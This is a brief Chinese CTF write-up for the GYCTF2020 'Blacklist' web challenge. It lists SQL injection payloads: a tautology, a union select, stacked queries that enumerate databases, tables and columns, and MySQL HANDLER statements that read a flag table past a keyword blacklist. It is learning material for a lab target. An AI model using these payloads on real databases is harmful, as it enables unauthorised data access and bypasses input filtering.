[GYCTF2020]Blacklist（学习）.md

1' or 1=1 or '1

1' union select 1,2#

被过滤了一堆关键字呜呜呜

搜索得知这题关键为堆叠注入

1'; show databases#

1'; show tables#

1'; show columns from FlagHere#

接下来是学习时间（悲

0';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#

有点像文件句柄，学到了呜呜呜

#Web #SQL注入 #堆叠注入